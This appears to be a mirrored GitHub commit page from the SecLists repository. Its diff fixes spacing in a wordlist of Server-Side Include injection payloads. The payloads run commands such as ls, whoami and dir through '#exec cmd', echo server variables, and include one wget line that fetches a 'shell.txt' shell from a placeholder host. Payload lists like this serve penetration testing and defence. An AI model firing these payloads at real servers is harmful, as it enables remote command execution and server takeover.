mirror of
https://github.com/danielmiessler/SecLists
synced 2025-12-06 17:03:31 +01:00
removed offending spaces
This commit is contained in:
parent
951ea38c65
commit
0e3255e359
1 changed files with 5 additions and 5 deletions
|
|
@ -1,12 +1,12 @@
|
||||||
<pre>< !--#exec cmd="ls" --> </pre>
|
<pre><!--#exec cmd="ls" --></pre>
|
||||||
<pre><!--#echo var="DATE_LOCAL" --> </pre>
|
<pre><!--#echo var="DATE_LOCAL" --> </pre>
|
||||||
<pre><!--#exec cmd="whoami"--></pre>
|
<pre><!--#exec cmd="whoami"--></pre>
|
||||||
<pre>< !--#exec cmd="dir" --></pre>
|
<pre><!--#exec cmd="dir" --></pre>
|
||||||
< !--#exec cmd="ls" -->
|
<!--#exec cmd="ls" -->
|
||||||
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
|
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
|
||||||
<!--#exec cmd="/bin/ls /" -->
|
<!--#exec cmd="/bin/ls /" -->
|
||||||
< !--#exec cmd="dir" -->
|
<!--#exec cmd="dir" -->
|
||||||
< !--#exec cmd="cd C:\WINDOWS\System32">
|
<!--#exec cmd="cd C:\WINDOWS\System32">
|
||||||
<!--#config errmsg="File not found, informs users and password"-->
|
<!--#config errmsg="File not found, informs users and password"-->
|
||||||
<!--#echo var="DOCUMENT_NAME" -->
|
<!--#echo var="DOCUMENT_NAME" -->
|
||||||
<!--#echo var="DOCUMENT_URI" -->
|
<!--#echo var="DOCUMENT_URI" -->
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue